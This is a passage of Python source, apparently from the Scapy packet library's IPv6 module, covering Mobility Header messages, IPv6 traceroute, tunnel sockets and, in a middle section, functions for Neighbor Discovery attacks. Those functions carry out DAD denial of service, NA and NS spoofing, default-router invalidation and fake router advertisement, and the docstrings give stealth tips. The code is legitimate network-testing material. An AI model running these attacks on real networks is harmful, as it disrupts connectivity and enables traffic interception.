    name = "IPv6 Mobility Header - Binding Error"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 7, mhtypes),
        ByteField("res", 0),
        XShortField("cksum", None),
        ByteEnumField("status", 0, _bestatus),
        ByteField("reserved", 0),
        IP6Field("ha", "::"),
        _MobilityOptionsField("options", [], MIP6OptUnknown, 24,
                              length_from=lambda pkt: 8 * (pkt.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}
|
|
# Mobility Header type value -> class implementing that message
_mip6_mhtype2cls = {
    0: MIP6MH_BRR,
    1: MIP6MH_HoTI,
    2: MIP6MH_CoTI,
    3: MIP6MH_HoT,
    4: MIP6MH_CoT,
    5: MIP6MH_BU,
    6: MIP6MH_BA,
    7: MIP6MH_BE,
}
|
|
|
|
#############################################################################
|
#############################################################################
|
### Traceroute6 ###
|
#############################################################################
|
#############################################################################
|
|
class AS_resolver6(AS_resolver_riswhois):
    """RIS whois resolver that looks through 6to4 and Teredo addresses."""

    def _resolve_one(self, ip):
        """
        Overloaded version performing the Whois resolution on the embedded
        IPv4 address when ip is a 6to4 or Teredo address; any other address
        is looked up as is.

        Returns the tuple (ip, asn, desc) where ip is the address received
        as argument. An asn of the form "AS<number>" is converted to int.
        """
        if in6_isaddr6to4(ip):
            # for 6to4, use the embedded address (bytes 2 to 5)
            packed = inet_pton(socket.AF_INET6, ip)
            lookup = inet_ntop(socket.AF_INET, packed[2:6])
        elif in6_isaddrTeredo(ip):
            # for Teredo, use the mapped address
            lookup = teredoAddrExtractInfo(ip)[2]
        else:
            lookup = ip

        _, asn, desc = AS_resolver_riswhois._resolve_one(self, lookup)

        if asn.startswith("AS"):
            try:
                asn = int(asn[2:])
            except ValueError:
                # not a plain number: keep the textual form
                pass

        return ip, asn, desc
|
|
class TracerouteResult6(TracerouteResult):
    """TracerouteResult specialised for IPv6 probes and ICMPv6 replies."""

    __slots__ = []

    def show(self):
        """
        Return the table built by make_table() with, for every
        (probe, reply) pair, the probed destination and port, the hop limit
        of the probe and the source (plus TCP flags or ICMPv6 type) of the
        reply.
        """
        return self.make_table(lambda s_r: (s_r[0].sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"),  # TODO: ICMPv6 !
                                            s_r[0].hlim,
                                            s_r[1].sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" +
                                                           "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" +
                                                           "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" +
                                                           "{ICMPv6EchoReply:%ir,type%}")))

    def get_trace(self):
        """
        Return a dict mapping each probed destination to a dict
        {hop limit: (reply source address, final)}.

        final is True when the reply is none of ICMPv6 Time Exceeded,
        Destination Unreachable, Packet Too Big or Parameter Problem.
        For every destination, hops located after the first final reply
        are dropped.
        """
        trace = {}

        for s, r in self.res:
            if IPv6 not in s:
                continue
            d = s[IPv6].dst
            if d not in trace:
                trace[d] = {}

            t = not (ICMPv6TimeExceeded in r or
                     ICMPv6DestUnreach in r or
                     ICMPv6PacketTooBig in r or
                     ICMPv6ParamProblem in r)

            trace[d][s[IPv6].hlim] = r[IPv6].src, t

        for hops in six.itervalues(trace):
            try:
                # Smallest hop limit that got a final reply. The minimum has
                # to be taken over the keys (hop limits), not over the
                # source addresses stored in the values.
                last_hop = min(hlim
                               for hlim, (_, final) in six.iteritems(hops)
                               if final)
            except ValueError:
                # no final reply for this destination: keep every hop
                continue
            for hlim in list(hops):  # use list(): hops is modified in the loop
                if hlim > last_hop:
                    del hops[hlim]

        return trace

    def graph(self, ASres=AS_resolver6(), **kargs):
        """Call TracerouteResult.graph() with an IPv6-aware AS resolver."""
        TracerouteResult.graph(self, ASres=ASres, **kargs)
|
|
@conf.commands.register
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
                l4=None, timeout=2, verbose=None, **kargs):
    """Instant TCP traceroute using IPv6
    traceroute6(target, [maxttl=30], [dport=80], [sport=80])
        -> (TracerouteResult6, unanswered packets)

    Probes are sent with every hop limit from minttl to maxttl. When l4 is
    None a TCP segment to dport is used as upper layer, otherwise l4 is.
    When verbose is None, conf.verb is used. Remaining keyword arguments
    are handed to sr().
    """
    if verbose is None:
        verbose = conf.verb

    base = IPv6(dst=target, hlim=(minttl, maxttl))
    if l4 is None:
        probes = base / TCP(seq=RandInt(), sport=sport, dport=dport)
        a, b = sr(probes, timeout=timeout, filter="icmp6 or tcp",
                  verbose=verbose, **kargs)
    else:
        a, b = sr(base / l4, timeout=timeout, verbose=verbose, **kargs)

    a = TracerouteResult6(a.res)

    if verbose:
        a.display()

    return a, b
|
|
#############################################################################
|
#############################################################################
|
### Sockets ###
|
#############################################################################
|
#############################################################################
|
|
class L3RawSocket6(L3RawSocket):
    """L3RawSocket variant emitting through an AF_INET6 raw socket."""

    def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):
        """
        Initialise the parent socket, then install an AF_INET6 raw socket
        for emission and an AF_PACKET raw socket bound to the given
        protocol type for reception. nofilter is accepted but not used here.
        """
        L3RawSocket.__init__(self, type, filter, iface, promisc)
        # NOTE(review): presumably the parent constructor already opened
        # self.ins / self.outs; they are replaced below without being
        # closed - confirm against L3RawSocket.
        # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292)
        emitter = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
        self.outs = emitter
        receiver = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type))
        self.ins = receiver
|
|
def IPv6inIP(dst='203.178.135.36', src=None):
    """
    Configure the _IPv6inIP socket class with the given IPv4 tunnel
    endpoints and return that class.

    If conf.L3socket is not already _IPv6inIP, it is remembered as the
    worker socket class; otherwise conf.L3socket is deleted.
    """
    _IPv6inIP.dst = dst
    _IPv6inIP.src = src
    if conf.L3socket == _IPv6inIP:
        del conf.L3socket
    else:
        _IPv6inIP.cls = conf.L3socket
    return _IPv6inIP
|
|
class _IPv6inIP(SuperSocket):
    """Socket sending and receiving IPv6 packets wrapped in IPv4 ones."""

    # Tunnel endpoints and worker socket class; set by IPv6inIP() / set()
    dst = '127.0.0.1'
    src = None
    cls = None

    def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):
        """Create the worker socket from cls, passing it the extra args."""
        SuperSocket.__init__(self, family, type, proto)
        self.worker = self.cls(**args)

    def set(self, dst, src=None):
        """Change the tunnel endpoints (stored on the class itself)."""
        _IPv6inIP.src = src
        _IPv6inIP.dst = dst

    def nonblock_recv(self):
        """Non-blocking receive on the worker, then decapsulation."""
        return self._recv(self.worker.nonblock_recv())

    def recv(self, x):
        """Receive on the worker, then decapsulation."""
        return self._recv(self.worker.recv(x), x)

    def _recv(self, p, x=MTU):
        """
        Return the IPv6 payload of p when p is an IP packet coming from
        the tunnel endpoint with the IPv6 protocol number; return p
        unchanged (possibly None) in every other case.
        """
        # TODO: verify checksum
        tunnelled = (isinstance(p, IP) and
                     p.src == self.dst and
                     p.proto == socket.IPPROTO_IPV6 and
                     isinstance(p.payload, IPv6))
        if tunnelled:
            return p.payload
        return p

    def send(self, x):
        """Send x through the worker, wrapped in an IP header."""
        outer = IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)
        return self.worker.send(outer / x)
|
|
|
#############################################################################
|
#############################################################################
|
### Neighbor Discovery Protocol Attacks ###
|
#############################################################################
|
#############################################################################
|
|
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
                        tgt_filter=None, reply_mac=None):
    """
    Internal generic helper accepting a specific callback as first argument,
    for NS or NA reply. See NDP_Attack_DAD_DoS_via_NS() and
    NDP_Attack_DAD_DoS_via_NA().

    reply_callback: called as reply_callback(req, reply_mac, iface) for
        every sniffed NS that passes the checks of is_request().

    iface: interface to sniff and reply on (conf.iface when not provided).

    mac_src_filter: if set, only NS with that Ethernet source are handled.

    tgt_filter: if set, only NS for that target address are handled. The
        address can be given in printable form (e.g. "2001:db8::1") or
        already packed.

    reply_mac: source mac address handed to the callback (the address of
        the interface when not provided).
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        # Get and compare the MAC address
        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must be the unspecified address
        if req[IPv6].src != "::":
            return 0

        # Check destination is the link-local solicited-node multicast
        # address associated with target address in received NS
        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0
        received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
        expected_snma = in6_getnsma(tgt)
        if received_snma != expected_snma:
            return 0

        return 1

    if not iface:
        iface = conf.iface

    # is_request() compares the filter with the packed target address, so
    # a filter given in printable form has to be packed first. A value that
    # cannot be converted is kept as is (filter provided already packed).
    if tgt_filter:
        try:
            tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)
        except (socket.error, ValueError, TypeError):
            pass

    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, iface),
          iface=iface)
|
|
|
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
    3756: listen for NS messages sent from the unspecified address and
    answer each of them with a NS for the same target address, so that the
    peer believes another node is also performing DAD for that address.

    By default, the fake NS uses:
     - target address: the target address found in the received NS;
     - IPv6 source address: the unspecified address (::);
     - IPv6 destination address: the link-local solicited-node multicast
       address derived from the target address in the received NS;
     - source mac address: the address of the interface (or reply_mac,
       see below);
     - destination mac address: the multicast mac address derived from the
       solicited-node multicast address used as IPv6 destination.

    The behavior can be changed with the following arguments:

    iface: a specific interface (e.g. "eth0") of the system on which the
           DoS should be launched. conf.iface is used if None is provided.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source trigger replies, which
         limits the effects of the DoS to a single target. The default
         value is None: the DoS is not limited to a specific mac address.

    tgt_filter: same as the previous one, but for a specific target IPv6
         address of the received NS. If the target address in the NS
         message (not the IPv6 destination address) matches that address,
         a fake reply is sent, i.e. the emitter becomes a target of the DoS.

    reply_mac: a specific source mac address for the reply, i.e. to prevent
         the use of the mac address of the interface.
    """

    def ns_reply_callback(req, reply_mac, iface):
        """
        Callback that replies to a NS by sending a similar NS
        """
        requester_mac = req[Ether].src
        snma = req[IPv6].dst
        tgt = req[ICMPv6ND_NS].tgt

        # Let's build a reply and send it
        reply = (Ether(src=reply_mac) /
                 IPv6(src="::", dst=snma) /
                 ICMPv6ND_NS(tgt=tgt))
        sendp(reply, iface=iface, verbose=0)

        print("Reply NS for target address %s (received from %s)" % (tgt, requester_mac))

    _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)
|
|
|
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NA described in section 4.1.3 of RFC
    3756: listen for NS messages *sent from the unspecified address* and
    answer each of them with a NA for the target address, so that the peer
    believes the address is already in use.

    By default, the fake NA uses:
     - target address: the target address found in the received NS;
     - IPv6 source address: the target address found in the received NS;
     - IPv6 destination address: the link-local solicited-node multicast
       address derived from the target address in the received NS;
     - source mac address: the address of the interface (or reply_mac,
       see below);
     - destination mac address: the multicast mac address derived from the
       solicited-node multicast address used as IPv6 destination;
     - a Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
       with the mac address used as source of the NA.

    The behavior can be changed with the following arguments:

    iface: a specific interface (e.g. "eth0") of the system on which the
          DoS should be launched. conf.iface is used if None is provided.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source trigger replies, which
         limits the effects of the DoS to a single target. The default
         value is None: the DoS is not limited to a specific mac address.

    tgt_filter: same as the previous one, but for a specific target IPv6
         address of the received NS. If the target address in the NS
         message (not the IPv6 destination address) matches that address,
         a fake reply is sent, i.e. the emitter becomes a target of the DoS.

    reply_mac: a specific source mac address for the reply, i.e. to prevent
         the use of the mac address of the interface. This address is also
         used in the Target Link-Layer Address option.
    """

    def na_reply_callback(req, reply_mac, iface):
        """
        Callback that replies to a NS with a NA
        """
        requester_mac = req[Ether].src
        snma = req[IPv6].dst
        tgt = req[ICMPv6ND_NS].tgt

        # Let's build a reply and send it
        reply = (Ether(src=reply_mac) /
                 IPv6(src=tgt, dst=snma) /
                 ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) /
                 ICMPv6NDOptDstLLAddr(lladdr=reply_mac))
        sendp(reply, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (tgt, requester_mac))

    _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)
|
|
|
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
                           reply_mac=None, router=False):
    """
    The main purpose of this function is to send fake Neighbor Advertisement
    messages to a victim. As the emission of unsolicited Neighbor
    Advertisement is pretty pointless (from an attacker standpoint) because
    it will not lead to a modification of a victim's neighbor cache, the
    function sends advertisements in response to received NS (NS sent as
    part of the DAD, i.e. with an unspecified address as source, are not
    considered).

    By default, the fake NA sent to create the DoS uses:
     - as target address the target address found in received NS.
     - as IPv6 source address: the target address
     - as IPv6 destination address: the source IPv6 address of received NS
       message.
     - the mac address of the interface as source (or reply_mac, see below).
     - the source mac address of the received NS as destination mac address
       of the emitted NA.
     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
       filled with the mac address used as source of the NA.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
          DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS. The address
         can be given in printable form (e.g. "2001:db8::1") or already
         packed.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface. This
         address will also be used in the Target Link-Layer Address option.

    router: by default (False) the 'R' flag in the NA used for the reply
         is not set. If the parameter is set to True, the 'R' flag in the
         NA is set, advertising us as a router.

    Please, keep the following in mind when using the function: for obvious
    reasons (kernel space vs. Python speed), when the target of the address
    resolution is on the link, the sender of the NS receives 2 NA messages
    in a row, the valid one and our fake one. The second one will overwrite
    the information provided by the first one, i.e. the natural latency of
    Scapy helps here.

    In practice, on a common Ethernet link, the emission of the NA from the
    genuine target (kernel stack) usually occurs in the same millisecond as
    the receipt of the NS. The NA generated by Scapy6 will usually come after
    something 20+ ms. On a usual testbed for instance, this difference is
    sufficient to have the first data packet sent from the victim to the
    destination before it even receives our fake NA.
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must NOT be the unspecified address
        if req[IPv6].src == "::":
            return 0

        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0

        dst = req[IPv6].dst
        if in6_isllsnmaddr(dst):  # Address is Link Layer Solicited Node mcast.

            # If this is a real address resolution NS, then the destination
            # address of the packet is the link-local solicited node multicast
            # address associated with the target of the NS.
            # Otherwise, the NS is a NUD related one, i.e. the peer is
            # unicasting the NS to check the target is still alive (L2
            # information is still in its cache and it is verified)
            received_snma = inet_pton(socket.AF_INET6, dst)
            expected_snma = in6_getnsma(tgt)
            if received_snma != expected_snma:
                print("solicited node multicast @ does not match target @!")
                return 0

        return 1

    def reply_callback(req, reply_mac, router, iface):
        """
        Callback that reply to a NS with a spoofed NA
        """

        # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
        # send it back.
        mac = req[Ether].src
        pkt = req[IPv6]
        src = pkt.src
        tgt = req[ICMPv6ND_NS].tgt
        rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
        rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1)  # target from the NS

        # "If the solicitation IP Destination Address is not a multicast
        # address, the Target Link-Layer Address option MAY be omitted"
        # Given our purpose, we always include it.
        rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)

        sendp(rep, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (tgt, mac))

    if not iface:
        iface = conf.iface

    # is_request() compares the filter with the packed target address, so
    # a filter given in printable form has to be packed first. A value that
    # cannot be converted is kept as is (filter provided already packed).
    if tgt_filter:
        try:
            tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)
        except (socket.error, ValueError, TypeError):
            pass

    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    router = 1 if router else 0  # Value of the R flags in NA

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, router, iface),
          iface=iface)
|
|
|
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
                           dst=None, src_mac=None, dst_mac=None, loop=True,
                           inter=1, iface=None):
    """
    Send fake Neighbor Solicitation messages to a victim, in order to either
    create a new entry in its neighbor cache or update an existing one.
    Section 7.2.3 of RFC 4861 states that a node SHOULD create the entry or
    update an existing one (if it is not currently performing DAD for the
    target of the NS). The reachability state of the entry is set to STALE.

    The two main parameters are the source link-layer address (carried by
    the Source Link-Layer Address option of the NS) and the source address
    of the packet.

    Unlike some other NDP_Attack_* functions, this one is not based on a
    stimulus/response model: when called, it sends the same NS packet in
    loop, every second by default.

    The format of the packets can be changed with the following arguments:

    src_lladdr: the MAC address used in the Source Link-Layer Address option
         of the NS packet. This is the address the peer should associate in
         its neighbor cache with the IPv6 source address of the packet. The
         mac address of the interface is used if None is provided.

    src: the IPv6 address used as source of the packet. If None is provided,
         an address associated with the emitting interface is used (based
         on the destination address of the packet).

    target: the target address of the NS packet. A dummy address
         (2001:db8::1) is used if no value is provided. The target has a
         direct impact on the destination address of the packet when the
         latter is not overridden: by default, the solicited-node multicast
         address associated with the target is used as destination.
         Consider providing a specific destination address if the target
         address is not the one of the victim.

    dst: the destination address of the NS. By default, the solicited-node
         multicast address associated with the target address (see previous
         parameter) is used. The victim is not expected to check the
         destination address of the packet, so a multicast address like
         ff02::1 should work to target all hosts on the link. On the
         contrary, to be more stealth, provide the address of the victim so
         that the packet is sent only to it.

    src_mac: the MAC address used as source of the packet. By default, this
         is the address of the interface. Use something else to be more
         stealth. Note that this address is not the one the victim will
         use to populate its neighbor cache.

    dst_mac: the MAC address used as destination of the packet. If the IPv6
         destination address is multicast (all-nodes, solicited node, ...),
         it is computed. If the destination address is unicast, a neighbor
         solicitation is performed to get the associated address. Provide
         the MAC address with this parameter for the attack to be stealth.

    loop: True by default, i.e. NS packets are sent in loop, separated by
         'inter' seconds (see below). When set to False, a single packet
         is sent.

    inter: when loop is True (the default), the interval in seconds between
         two NS packets.

    iface: to force the sending interface.
    """
    if not iface:
        iface = conf.iface

    # Source link-layer address option: the provided MAC address, or the
    # one of the interface when none is given.
    if not src_lladdr:
        src_lladdr = get_if_hwaddr(iface)

    # Only the Ethernet addresses explicitly provided are set
    ether_params = {}
    for key, value in (("src", src_mac), ("dst", dst_mac)):
        if value:
            ether_params[key] = value

    ipv6_params = {}
    if src:
        ipv6_params["src"] = src
    if not dst:
        # Default destination: the solicited-node multicast address
        # associated with the target address.
        nsma = in6_getnsma(inet_pton(socket.AF_INET6, target))
        ipv6_params["dst"] = inet_ntop(socket.AF_INET6, nsma)
    else:
        ipv6_params["dst"] = dst

    pkt = (Ether(**ether_params) /
           IPv6(**ipv6_params) /
           ICMPv6ND_NS(tgt=target) /
           ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr))

    sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
|
|
|
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
                                   ip_src_filter=None, reply_mac=None,
                                   tgt_mac=None):
    """
    The purpose of the function is to monitor incoming RA messages
    sent by default routers (RA with a non-zero Router Lifetime values)
    and invalidate them by immediately replying with fake RA messages
    advertising a zero Router Lifetime value.

    The result on receivers is that the router is immediately invalidated,
    i.e. the associated entry is discarded from the default router list
    and destination cache is updated to reflect the change.

    By default, the function considers all RA messages with a non-zero
    Router Lifetime value but provides configuration knobs to allow
    filtering RA sent by specific routers (Ethernet source address).
    With regard to emission, the multicast all-nodes address is used
    by default but a specific target can be used, in order for the DoS to
    apply only to a specific host.

    More precisely, following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
         DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RA messages received from this source will trigger replies.
         If other default routers advertised their presence on the link,
         their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific mac address.

    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RA messages received from this source address will trigger
         replies. If other default routers advertised their presence on the
         link, their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific IPv6 source
         address.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface.

    tgt_mac: allow limiting the effect of the DoS to a specific host,
         by sending the "invalidating RA" only to its mac address.
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Check if packet req is a request
        """

        if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        ip_src = req[IPv6].src
        if ip_src_filter and ip_src != ip_src_filter:
            return 0

        # Check if this is an advertisement for a Default Router
        # by looking at Router Lifetime value
        if req[ICMPv6ND_RA].routerlifetime == 0:
            return 0

        return 1

    def ra_reply_callback(req, reply_mac, tgt_mac, iface):
        """
        Callback that sends an RA with a 0 lifetime
        """

        # Let's build a reply and send it

        src = req[IPv6].src

        # Prepare packets parameters
        ether_params = {}
        if reply_mac:
            ether_params["src"] = reply_mac

        if tgt_mac:
            ether_params["dst"] = tgt_mac

        # Pick the link-layer address to advertise before walking the PIOs:
        # the walk below detaches the payload of every PIO it visits
        # (del pio.payload), which would hide a Source Link-Layer Address
        # option located after a PIO in the received RA.
        if ICMPv6NDOptSrcLLAddr in req:
            mac = req[ICMPv6NDOptSrcLLAddr].lladdr
        else:
            mac = req[Ether].src

        # Basis of fake RA (high pref, zero lifetime)
        rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
        rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)

        # Add it a PIO from the request ...
        tmp = req
        while ICMPv6NDOptPrefixInfo in tmp:
            pio = tmp[ICMPv6NDOptPrefixInfo]
            tmp = pio.payload
            del pio.payload
            rep /= pio

        # ... and source link layer address option
        rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)

        sendp(rep, iface=iface, verbose=0)

        print("Fake RA sent with source address %s" % src)

    if not iface:
        iface = conf.iface
    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
          prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
          iface=iface)
|
|
|
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
                           ip_src_filter=None):
    """
    Send the provided RA message at layer 2 (i.e. a packet starting with
    IPv6 will not work) in response to received RS messages. In the end,
    the function is a simple wrapper around sendp() that monitors the link
    for RS messages.

    It is probably better explained with an example:

      >>> ra  = Ether()/IPv6()/ICMPv6ND_RA()
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
      >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
      >>> NDP_Attack_Fake_Router(ra, iface="eth0")
      Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
      Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
      ...

    The behavior can be changed with the following arguments:

      ra: the RA message to send in response to received RS messages.

      iface: a specific interface (e.g. "eth0") of the system on which the
             DoS should be launched. conf.iface is used if none is provided.

      mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RS messages received from this source trigger a reply. The
         provided RA is not modified, which implies that the Ethernet
         destination address of the RA has to be set to the same value in
         order to target only the source of the RS.
         The default value is None: no filtering on the source of RS is
         done.

      ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RS messages received from this source address trigger
         replies. The comment made for the previous argument applies: when
         using the option, you will probably want to set a specific
         Ethernet destination address in the RA.
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Check if packet req is a request
        """
        for layer in (Ether, IPv6, ICMPv6ND_RS):
            if layer not in req:
                return 0

        if mac_src_filter and req[Ether].src != mac_src_filter:
            return 0

        if ip_src_filter and req[IPv6].src != ip_src_filter:
            return 0

        return 1

    def ra_reply_callback(req, iface):
        """
        Callback that sends an RA in reply to an RS
        """
        requester = req[IPv6].src
        sendp(ra, iface=iface, verbose=0)
        print("Fake RA sent in response to RS from %s" % requester)

    if not iface:
        iface = conf.iface

    sniff(store=0,
          filter="icmp6",
          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
          prn=lambda x: ra_reply_callback(x, iface),
          iface=iface)
|
|
|
#############################################################################
|
#############################################################################
|
### Layers binding ###
|
#############################################################################
|
#############################################################################
|
|
# Register the layers with the l3types / l2types tables of conf
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, _IPv46)
conf.l2types.register_num2layer(DLT_RAW_ALT, _IPv46)

# Lower layers carrying IPv6
bind_layers(Ether, IPv6, type=0x86dd)
bind_layers(CookedLinux, IPv6, proto=0x86dd)
bind_layers(GRE, IPv6, proto=0x86dd)
bind_layers(SNAP, IPv6, code=0x86dd)
bind_layers(Loopback, IPv6, type=0x1c)
# Upper layers selected through the next header value
bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
# Tunnels
bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)
|